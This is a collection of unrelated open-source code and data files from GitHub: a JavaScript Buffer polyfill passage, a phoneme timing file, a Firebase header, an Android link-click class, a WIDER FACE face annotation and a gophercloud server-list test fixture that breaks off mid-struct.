var val = this[offset + --i]
while (i > 0 && (mul *= 0x100)) {
val += this[offset + --i] * mul
}
mul *= 0x80
if (val >= mul) val -= Math.pow(2, 8 * byteLength)
return val
}
Buffer.prototype.readInt8 = function readInt8 (offset, noAssert) {
if (!noAssert) checkOffset(offset, 1, this.length)
if (!(this[offset] & 0x80)) return (this[offset])
return ((0xff - this[offset] + 1) * -1)
}
Buffer.prototype.readInt16LE = function readInt16LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
var val = this[offset] | (this[offset + 1] << 8)
return (val & 0x8000) ? val | 0xFFFF0000 : val
}
Buffer.prototype.readInt16BE = function readInt16BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
var val = this[offset + 1] | (this[offset] << 8)
return (val & 0x8000) ? val | 0xFFFF0000 : val
}
Buffer.prototype.readInt32LE = function readInt32LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return (this[offset]) |
(this[offset + 1] << 8) |
(this[offset + 2] << 16) |
(this[offset + 3] << 24)
}
Buffer.prototype.readInt32BE = function readInt32BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return (this[offset] << 24) |
(this[offset + 1] << 16) |
(this[offset + 2] << 8) |
(this[offset + 3])
}
Buffer.prototype.readFloatLE = function readFloatLE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return ieee754.read(this, offset, true, 23, 4)
}
Buffer.prototype.readFloatBE = function readFloatBE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return ieee754.read(this, offset, false, 23, 4)
}
Buffer.prototype.readDoubleLE = function readDoubleLE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 8, this.length)
return ieee754.read(this, offset, true, 52, 8)
}
Buffer.prototype.readDoubleBE = function readDoubleBE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 8, this.length)
return ieee754.read(this, offset, false, 52, 8)
}
function checkInt (buf, value, offset, ext, max, min) {
if (!Buffer.isBuffer(buf)) throw new TypeError('"buffer" argument must be a Buffer instance')
if (value > max || value < min) throw new RangeError('"value" argument is out of bounds')
if (offset + ext > buf.length) throw new RangeError('Index out of range')
}
Buffer.prototype.writeUIntLE = function writeUIntLE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) {
var maxBytes = Math.pow(2, 8 * byteLength) - 1
checkInt(this, value, offset, byteLength, maxBytes, 0)
}
var mul = 1
var i = 0
this[offset] = value & 0xFF
while (++i < byteLength && (mul *= 0x100)) {
this[offset + i] = (value / mul) & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeUIntBE = function writeUIntBE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) {
var maxBytes = Math.pow(2, 8 * byteLength) - 1
checkInt(this, value, offset, byteLength, maxBytes, 0)
}
var i = byteLength - 1
var mul = 1
this[offset + i] = value & 0xFF
while (--i >= 0 && (mul *= 0x100)) {
this[offset + i] = (value / mul) & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeUInt8 = function writeUInt8 (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 1, 0xff, 0)
if (!Buffer.TYPED_ARRAY_SUPPORT) value = Math.floor(value)
this[offset] = (value & 0xff)
return offset + 1
}
function objectWriteUInt16 (buf, value, offset, littleEndian) {
if (value < 0) value = 0xffff + value + 1
for (var i = 0, j = Math.min(buf.length - offset, 2); i < j; ++i) {
buf[offset + i] = (value & (0xff << (8 * (littleEndian ? i : 1 - i)))) >>>
(littleEndian ? i : 1 - i) * 8
}
}
Buffer.prototype.writeUInt16LE = function writeUInt16LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0xffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value & 0xff)
this[offset + 1] = (value >>> 8)
} else {
objectWriteUInt16(this, value, offset, true)
}
return offset + 2
}
Buffer.prototype.writeUInt16BE = function writeUInt16BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0xffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 8)
this[offset + 1] = (value & 0xff)
} else {
objectWriteUInt16(this, value, offset, false)
}
return offset + 2
}
function objectWriteUInt32 (buf, value, offset, littleEndian) {
if (value < 0) value = 0xffffffff + value + 1
for (var i = 0, j = Math.min(buf.length - offset, 4); i < j; ++i) {
buf[offset + i] = (value >>> (littleEndian ? i : 3 - i) * 8) & 0xff
}
}
Buffer.prototype.writeUInt32LE = function writeUInt32LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0xffffffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset + 3] = (value >>> 24)
this[offset + 2] = (value >>> 16)
this[offset + 1] = (value >>> 8)
this[offset] = (value & 0xff)
} else {
objectWriteUInt32(this, value, offset, true)
}
return offset + 4
}
Buffer.prototype.writeUInt32BE = function writeUInt32BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0xffffffff, 0)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 24)
this[offset + 1] = (value >>> 16)
this[offset + 2] = (value >>> 8)
this[offset + 3] = (value & 0xff)
} else {
objectWriteUInt32(this, value, offset, false)
}
return offset + 4
}
Buffer.prototype.writeIntLE = function writeIntLE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) {
var limit = Math.pow(2, 8 * byteLength - 1)
checkInt(this, value, offset, byteLength, limit - 1, -limit)
}
var i = 0
var mul = 1
var sub = 0
this[offset] = value & 0xFF
while (++i < byteLength && (mul *= 0x100)) {
if (value < 0 && sub === 0 && this[offset + i - 1] !== 0) {
sub = 1
}
this[offset + i] = ((value / mul) >> 0) - sub & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeIntBE = function writeIntBE (value, offset, byteLength, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) {
var limit = Math.pow(2, 8 * byteLength - 1)
checkInt(this, value, offset, byteLength, limit - 1, -limit)
}
var i = byteLength - 1
var mul = 1
var sub = 0
this[offset + i] = value & 0xFF
while (--i >= 0 && (mul *= 0x100)) {
if (value < 0 && sub === 0 && this[offset + i + 1] !== 0) {
sub = 1
}
this[offset + i] = ((value / mul) >> 0) - sub & 0xFF
}
return offset + byteLength
}
Buffer.prototype.writeInt8 = function writeInt8 (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 1, 0x7f, -0x80)
if (!Buffer.TYPED_ARRAY_SUPPORT) value = Math.floor(value)
if (value < 0) value = 0xff + value + 1
this[offset] = (value & 0xff)
return offset + 1
}
Buffer.prototype.writeInt16LE = function writeInt16LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0x7fff, -0x8000)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value & 0xff)
this[offset + 1] = (value >>> 8)
} else {
objectWriteUInt16(this, value, offset, true)
}
return offset + 2
}
Buffer.prototype.writeInt16BE = function writeInt16BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 2, 0x7fff, -0x8000)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 8)
this[offset + 1] = (value & 0xff)
} else {
objectWriteUInt16(this, value, offset, false)
}
return offset + 2
}
Buffer.prototype.writeInt32LE = function writeInt32LE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0x7fffffff, -0x80000000)
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value & 0xff)
this[offset + 1] = (value >>> 8)
this[offset + 2] = (value >>> 16)
this[offset + 3] = (value >>> 24)
} else {
objectWriteUInt32(this, value, offset, true)
}
return offset + 4
}
Buffer.prototype.writeInt32BE = function writeInt32BE (value, offset, noAssert) {
value = +value
offset = offset | 0
if (!noAssert) checkInt(this, value, offset, 4, 0x7fffffff, -0x80000000)
if (value < 0) value = 0xffffffff + value + 1
if (Buffer.TYPED_ARRAY_SUPPORT) {
this[offset] = (value >>> 24)
this[offset + 1] = (value >>> 16)
this[offset + 2] = (value >>> 8)
this[offset + 3] = (value & 0xff)
} else {
objectWriteUInt32(this, value, offset, false)
}
return offset + 4
}
function checkIEEE754 (buf, value, offset, ext, max, min) {
if (offset + ext > buf.length) throw new RangeError('Index out of range')
if (offset < 0) throw new RangeError('Index out of range')
}
function writeFloat (buf, value, offset, littleEndian, noAssert) {
if (!noAssert) {
checkIEEE754(buf, value, offset, 4, 3.4028234663852886e+38, -3.4028234663852886e+38)
}
ieee754.write(buf, value, offset, littleEndian, 23, 4)
return offset + 4
}
Buffer.prototype.writeFloatLE = function writeFloatLE (value, offset, noAssert) {
return writeFloat(this, value, offset, true, noAssert)
}
Buffer.prototype.writeFloatBE = function writeFloatBE (value, offset, noAssert) {
return writeFloat(this, value, offset, false, noAssert)
}
function writeDouble (buf, value, offset, littleEndian, noAssert) {
if (!noAssert) {
checkIEEE754(buf, value, offset, 8, 1.7976931348623157E+308, -1.7976931348623157E+308)
}
ieee754.write(buf, value, offset, littleEndian, 52, 8)
return offset + 8
}
Buffer.prototype.writeDoubleLE = function writeDoubleLE (value, offset, noAssert) {
return writeDouble(this, value, offset, true, noAssert)
}
Buffer.prototype.writeDoubleBE = function writeDoubleBE (value, offset, noAssert) {
return writeDouble(this, value, offset, false, noAssert)
}
// copy(targetBuffer, targetStart=0, sourceStart=0, sourceEnd=buffer.length)
Buffer.prototype.copy = function copy (target, targetStart, start, end) {
if (!start) start = 0
if (!end && end !== 0) end = this.length
if (targetStart >= target.length) targetStart = target.length
if (!targetStart) targetStart = 0
if (end > 0 && end < start) end = start
// Copy 0 bytes; we're done
if (end === start) return 0
if (target.length === 0 || this.length === 0) return 0
// Fatal error conditions
if (targetStart < 0) {
throw new RangeError('targetStart out of bounds')
}
if (start < 0 || start >= this.length) throw new RangeError('sourceStart out of bounds')
if (end < 0) throw new RangeError('sourceEnd out of bounds')
// Are we oob?
if (end > this.length) end = this.length
if (target.length - targetStart < end - start) {
end = target.length - targetStart + start
}
var len = end - start
var i
if (this === target && start < targetStart && targetStart < end) {
// descending copy from end
for (i = len - 1; i >= 0; --i) {
target[i + targetStart] = this[i + start]
}
} else if (len < 1000 || !Buffer.TYPED_ARRAY_SUPPORT) {
// ascending copy from start
for (i = 0; i < len; ++i) {
target[i + targetStart] = this[i + start]
}
} else {
Uint8Array.prototype.set.call(
target,
this.subarray(start, start + len),
targetStart
)
}
return len
}
// Usage:
// buffer.fill(number[, offset[, end]])
// buffer.fill(buffer[, offset[, end]])
// buffer.fill(string[, offset[, end]][, encoding])
Buffer.prototype.fill = function fill (val, start, end, encoding) {
// Handle string cases:
if (typeof val === 'string') {
if (typeof start === 'string') {
encoding = start
start = 0
end = this.length
} else if (typeof end === 'string') {
encoding = end
end = this.length
}
if (val.length === 1) {
var code = val.charCodeAt(0)
if (code < 256) {
val = code
}
}
if (encoding !== undefined && typeof encoding !== 'string') {
throw new TypeError('encoding must be a string')
}
if (typeof encoding === 'string' && !Buffer.isEncoding(encoding)) {
throw new TypeError('Unknown encoding: ' + encoding)
}
} else if (typeof val === 'number') {
val = val & 255
}
// Invalid ranges are not set to a default, so can range check early.
if (start < 0 || this.length < start || this.length < end) {
throw new RangeError('Out of range index')
}
if (end <= start) {
return this
}
start = start >>> 0
end = end === undefined ? this.length : end >>> 0
if (!val) val = 0
var i
if (typeof val === 'number') {
for (i = start; i < end; ++i) {
this[i] = val
}
} else {
var bytes = Buffer.isBuffer(val)
? val
: utf8ToBytes(new Buffer(val, encoding).toString())
var len = bytes.length
for (i = 0; i < end - start; ++i) {
this[i + start] = bytes[i % len]
}
}
return this
}
// HELPER FUNCTIONS
// ================
var INVALID_BASE64_RE = /[^+\/0-9A-Za-z-_]/g
function base64clean (str) {
// Node strips out invalid characters like \n and \t from the string, base64-js does not
str = stringtrim(str).replace(INVALID_BASE64_RE, '')
// Node converts strings with length < 2 to ''
if (str.length < 2) return ''
// Node allows for non-padded base64 strings (missing trailing ===), base64-js does not
while (str.length % 4 !== 0) {
str = str + '='
}
return str
}
function stringtrim (str) {
if (str.trim) return str.trim()
return str.replace(/^\s+|\s+$/g, '')
}
function toHex (n) {
if (n < 16) return '0' + n.toString(16)
return n.toString(16)
}
function utf8ToBytes (string, units) {
units = units || Infinity
var codePoint
var length = string.length
var leadSurrogate = null
var bytes = []
for (var i = 0; i < length; ++i) {
codePoint = string.charCodeAt(i)
// is surrogate component
if (codePoint > 0xD7FF && codePoint < 0xE000) {
// last char was a lead
if (!leadSurrogate) {
// no lead yet
if (codePoint > 0xDBFF) {
// unexpected trail
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
continue
} else if (i + 1 === length) {
// unpaired lead
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
continue
}
// valid lead
leadSurrogate = codePoint
continue
}
// 2 leads in a row
if (codePoint < 0xDC00) {
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
leadSurrogate = codePoint
continue
}
// valid surrogate pair
codePoint = (leadSurrogate - 0xD800 << 10 | codePoint - 0xDC00) + 0x10000
} else if (leadSurrogate) {
// valid bmp char, but last char was a lead
if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD)
}
leadSurrogate = null
// encode utf8
if (codePoint < 0x80) {
if ((units -= 1) < 0) break
bytes.push(codePoint)
} else if (codePoint < 0x800) {
if ((units -= 2) < 0) break
bytes.push(
codePoint >> 0x6 | 0xC0,
codePoint & 0x3F | 0x80
)
} else if (codePoint < 0x10000) {
if ((units -= 3) < 0) break
bytes.push(
codePoint >> 0xC | 0xE0,
codePoint >> 0x6 & 0x3F | 0x80,
codePoint & 0x3F | 0x80
)
} else if (codePoint < 0x110000) {
if ((units -= 4) < 0) break
bytes.push(
codePoint >> 0x12 | 0xF0,
codePoint >> 0xC & 0x3F | 0x80,
codePoint >> 0x6 & 0x3F | 0x80,
codePoint & 0x3F | 0x80
)
} else {
throw new Error('Invalid code point')
}
}
return bytes
}
function asciiToBytes (str) {
var byteArray = []
for (var i = 0; i < str.length; ++i) {
// Node's code seems to be doing this and not & 0x7F..
byteArray.push(str.charCodeAt(i) & 0xFF)
}
return byteArray
}
function utf16leToBytes (str, units) {
var c, hi, lo
var byteArray = []
for (var i = 0; i < str.length; ++i) {
if ((units -= 2) < 0) break
c = str.charCodeAt(i)
hi = c >> 8
lo = c % 256
byteArray.push(lo)
byteArray.push(hi)
}
return byteArray
}
function base64ToBytes (str) {
return base64.toByteArray(base64clean(str))
}
function blitBuffer (src, dst, offset, length) {
for (var i = 0; i < length; ++i) {
if ((i + offset >= dst.length) || (i >= src.length)) break
dst[i + offset] = src[i]
}
return i
}
function isnan (val) {
return val !== val // eslint-disable-line no-self-compare
}
| {
"pile_set_name": "Github"
} |
;link
l 58
I 55 0 230 80 213 100 213
N 68 100 196
k_h 84
_ 25
;not
n 58
A 120 0 221 80 204 100 204
t_h 93
_ 25
;active
{ 98 0 206 80 152 100 152
k_h 84
t_h 93
I 57 0 158 80 152 100 152
v 58
;to
t_h 78
u 200 0 154 80 147 100 147
_ 203
_ 1
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2017 Google
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#import <Foundation/Foundation.h>
@class FIRInstallations;
// A class for wrapping the interactions for retrieving client side info to be used in
// request parameter for interacting with Firebase iam servers.
NS_ASSUME_NONNULL_BEGIN
@interface FIRIAMClientInfoFetcher : NSObject
- (instancetype)initWithFirebaseInstallations:(nullable FIRInstallations *)installations;
- (instancetype)init NS_UNAVAILABLE;
// Fetch the up-to-date Firebase Installation ID (FID) and Firebase Installation Service (FIS) token
// data. Since it involves a server interaction, completion callback is provided for receiving the
// result.
- (void)fetchFirebaseInstallationDataWithProjectNumber:(NSString *)projectNumber
withCompletion:
(void (^)(NSString *_Nullable FID,
NSString *_Nullable FISToken,
NSError *_Nullable error))completion;
// Following are synchronous methods for fetching data
- (nullable NSString *)getDeviceLanguageCode;
- (nullable NSString *)getAppVersion;
- (nullable NSString *)getOSVersion;
- (nullable NSString *)getOSMajorVersion;
- (nullable NSString *)getTimezone;
- (NSString *)getIAMSDKVersion;
@end
NS_ASSUME_NONNULL_END
| {
"pile_set_name": "Github"
} |
package me.saket.dank.utils;
import android.graphics.Point;
import android.text.Spannable;
import android.text.style.ClickableSpan;
import android.view.MotionEvent;
import android.widget.TextView;
import me.saket.bettermovementmethod.BetterLinkMovementMethod;
import me.saket.dank.utils.markdown.markwon.SpoilerRevealClickListenerSpan;
/**
* Extension of BetterLinkMovementMethod that also tracks the coordinates of a clicked link.
*/
public class DankLinkMovementMethod extends BetterLinkMovementMethod {
private Point clickedUrlCoordinates;
public static DankLinkMovementMethod newInstance() {
return new DankLinkMovementMethod();
}
public Point getLastUrlClickCoordinates() {
return clickedUrlCoordinates;
}
@Override
public boolean onTouchEvent(TextView view, Spannable text, MotionEvent event) {
if (event.getAction() == MotionEvent.ACTION_UP) {
// A link is potentially going to be clicked.
clickedUrlCoordinates = new Point((int) event.getRawX(), (int) event.getRawY());
}
return super.onTouchEvent(view, text, event);
}
@Override
protected void highlightUrl(TextView textView, ClickableSpan clickableSpan, Spannable text) {
if (clickableSpan instanceof SpoilerRevealClickListenerSpan) {
return;
}
super.highlightUrl(textView, clickableSpan, text);
}
@Override
protected void dispatchUrlClick(TextView textView, ClickableSpan clickableSpan) {
if (clickableSpan instanceof SpoilerRevealClickListenerSpan) {
clickableSpan.onClick(textView);
return;
}
super.dispatchUrlClick(textView, clickableSpan);
}
@Override
protected void dispatchUrlLongClick(TextView textView, ClickableSpan clickableSpan) {
if (!(clickableSpan instanceof SpoilerRevealClickListenerSpan)) {
super.dispatchUrlLongClick(textView, clickableSpan);
}
}
}
| {
"pile_set_name": "Github"
} |
// not "use strict" so we can declare global "Promise"
var asap = require('asap');
if (typeof Promise === 'undefined') {
Promise = require('./lib/core.js')
require('./lib/es6-extensions.js')
}
require('./polyfill-done.js');
| {
"pile_set_name": "Github"
} |
a 1
| {
"pile_set_name": "Github"
} |
<annotation>
<folder>widerface</folder>
<filename>22--Picnic_22_Picnic_Picnic_22_68.jpg</filename>
<source>
<database>wider face Database</database>
<annotation>PASCAL VOC2007</annotation>

<flickrid>-1</flickrid>
</source>
<owner>
<flickrid>yanyu</flickrid>
<name>yanyu</name>
</owner>
<size>
<width>1024</width>
<height>1366</height>
<depth>3</depth>
</size>
<segmented>0</segmented>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>393</xmin>
<ymin>806</ymin>
<xmax>456</xmax>
<ymax>881</ymax>
</bndbox>
<lm>
<x1>420.75</x1>
<y1>831.25</y1>
<x2>445.594</x2>
<y2>836.406</y2>
<x3>431.531</x3>
<y3>852.344</y3>
<x4>417.938</x4>
<y4>860.312</y4>
<x5>438.094</x5>
<y5>864.531</y5>
<visible>0</visible>
<blur>0.71</blur>
</lm>
<has_lm>1</has_lm>
</object>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>487</xmin>
<ymin>757</ymin>
<xmax>530</xmax>
<ymax>817</ymax>
</bndbox>
<lm>
<x1>501.929</x1>
<y1>781.946</y1>
<x2>521.661</x2>
<y2>782.326</y2>
<x3>510.656</x3>
<y3>786.5</y3>
<x4>503.446</x4>
<y4>800.161</y4>
<x5>515.589</x5>
<y5>799.402</y5>
<visible>0</visible>
<blur>0.66</blur>
</lm>
<has_lm>1</has_lm>
</object>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>563</xmin>
<ymin>717</ymin>
<xmax>621</xmax>
<ymax>787</ymax>
</bndbox>
<lm>
<x1>566.75</x1>
<y1>738.241</y1>
<x2>589.29</x2>
<y2>740.893</y2>
<x3>571.17</x3>
<y3>752.826</y3>
<x4>574.263</x4>
<y4>766.527</y4>
<x5>588.406</x5>
<y5>766.969</y5>
<visible>0</visible>
<blur>0.66</blur>
</lm>
<has_lm>1</has_lm>
</object>
<object>
<name>face</name>
<pose>Unspecified</pose>
<truncated>1</truncated>
<difficult>0</difficult>
<bndbox>
<xmin>771</xmin>
<ymin>812</ymin>
<xmax>815</xmax>
<ymax>882</ymax>
</bndbox>
<lm>
<x1>777.915</x1>
<y1>836.335</y1>
<x2>781.451</x2>
<y2>838.545</y2>
<x3>770.844</x3>
<y3>850.92</y3>
<x4>778.357</x4>
<y4>862.853</y4>
<x5>780.567</x5>
<y5>865.504</y5>
<visible>0</visible>
<blur>0.63</blur>
</lm>
<has_lm>1</has_lm>
</object>
</annotation> | {
"pile_set_name": "Github"
} |
// +build fixtures
package servers
import (
"fmt"
"net/http"
"testing"
th "github.com/rackspace/gophercloud/testhelper"
"github.com/rackspace/gophercloud/testhelper/client"
)
// ServerListBody contains the canned body of a servers.List response.
const ServerListBody = `
{
"servers": [
{
"status": "ACTIVE",
"updated": "2014-09-25T13:10:10Z",
"hostId": "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
"OS-EXT-SRV-ATTR:host": "devstack",
"addresses": {
"private": [
{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:7c:1b:2b",
"version": 4,
"addr": "10.0.0.32",
"OS-EXT-IPS:type": "fixed"
}
]
},
"links": [
{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "self"
},
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "bookmark"
}
],
"key_name": null,
"image": {
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:task_state": null,
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name": "instance-0000001e",
"OS-SRV-USG:launched_at": "2014-09-25T13:10:10.000000",
"OS-EXT-SRV-ATTR:hypervisor_hostname": "devstack",
"flavor": {
"id": "1",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark"
}
]
},
"id": "ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"security_groups": [
{
"name": "default"
}
],
"OS-SRV-USG:terminated_at": null,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "9349aff8be7545ac9d2f1d00999a23cd",
"name": "herp",
"created": "2014-09-25T13:10:02Z",
"tenant_id": "fcad67a6189847c4aecfa3c81a05783b",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
},
{
"status": "ACTIVE",
"updated": "2014-09-25T13:04:49Z",
"hostId": "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
"OS-EXT-SRV-ATTR:host": "devstack",
"addresses": {
"private": [
{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:9e:89:be",
"version": 4,
"addr": "10.0.0.31",
"OS-EXT-IPS:type": "fixed"
}
]
},
"links": [
{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "self"
},
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "bookmark"
}
],
"key_name": null,
"image": {
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:task_state": null,
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name": "instance-0000001d",
"OS-SRV-USG:launched_at": "2014-09-25T13:04:49.000000",
"OS-EXT-SRV-ATTR:hypervisor_hostname": "devstack",
"flavor": {
"id": "1",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark"
}
]
},
"id": "9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"security_groups": [
{
"name": "default"
}
],
"OS-SRV-USG:terminated_at": null,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "9349aff8be7545ac9d2f1d00999a23cd",
"name": "derp",
"created": "2014-09-25T13:04:41Z",
"tenant_id": "fcad67a6189847c4aecfa3c81a05783b",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
}
]
}
`
// SingleServerBody is the canned body of a Get request on an existing server.
const SingleServerBody = `
{
"server": {
"status": "ACTIVE",
"updated": "2014-09-25T13:04:49Z",
"hostId": "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
"OS-EXT-SRV-ATTR:host": "devstack",
"addresses": {
"private": [
{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:9e:89:be",
"version": 4,
"addr": "10.0.0.31",
"OS-EXT-IPS:type": "fixed"
}
]
},
"links": [
{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "self"
},
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"rel": "bookmark"
}
],
"key_name": null,
"image": {
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:task_state": null,
"OS-EXT-STS:vm_state": "active",
"OS-EXT-SRV-ATTR:instance_name": "instance-0000001d",
"OS-SRV-USG:launched_at": "2014-09-25T13:04:49.000000",
"OS-EXT-SRV-ATTR:hypervisor_hostname": "devstack",
"flavor": {
"id": "1",
"links": [
{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark"
}
]
},
"id": "9e5476bd-a4ec-4653-93d6-72c93aa682ba",
"security_groups": [
{
"name": "default"
}
],
"OS-SRV-USG:terminated_at": null,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "9349aff8be7545ac9d2f1d00999a23cd",
"name": "derp",
"created": "2014-09-25T13:04:41Z",
"tenant_id": "fcad67a6189847c4aecfa3c81a05783b",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
}
}
`
var (
// ServerHerp is a Server struct that should correspond to the first result in ServerListBody.
ServerHerp = Server{
Status: "ACTIVE",
Updated: "2014-09-25T13:10:10Z",
HostID: "29d3c8c896a45aa4c34e52247875d7fefc3d94bbcc9f622b5d204362",
Addresses: map[string]interface{}{
"private": []interface{}{
map[string]interface{}{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:7c:1b:2b",
"version": float64(4),
"addr": "10.0.0.32",
"OS-EXT-IPS:type": "fixed",
},
},
},
Links: []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/v2/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "self",
},
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/servers/ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
"rel": "bookmark",
},
},
Image: map[string]interface{}{
"id": "f90f6034-2570-4974-8351-6b49732ef2eb",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/images/f90f6034-2570-4974-8351-6b49732ef2eb",
"rel": "bookmark",
},
},
},
Flavor: map[string]interface{}{
"id": "1",
"links": []interface{}{
map[string]interface{}{
"href": "http://104.130.131.164:8774/fcad67a6189847c4aecfa3c81a05783b/flavors/1",
"rel": "bookmark",
},
},
},
ID: "ef079b0c-e610-4dfb-b1aa-b49f07ac48e5",
UserID: "9349aff8be7545ac9d2f1d00999a23cd",
Name: "herp",
Created: "2014-09-25T13:10:02Z",
TenantID: "fcad67a6189847c4aecfa3c81a05783b",
Metadata: map[string]interface{}{},
SecurityGroups: []map[string]interface{}{
map[string]interface{}{
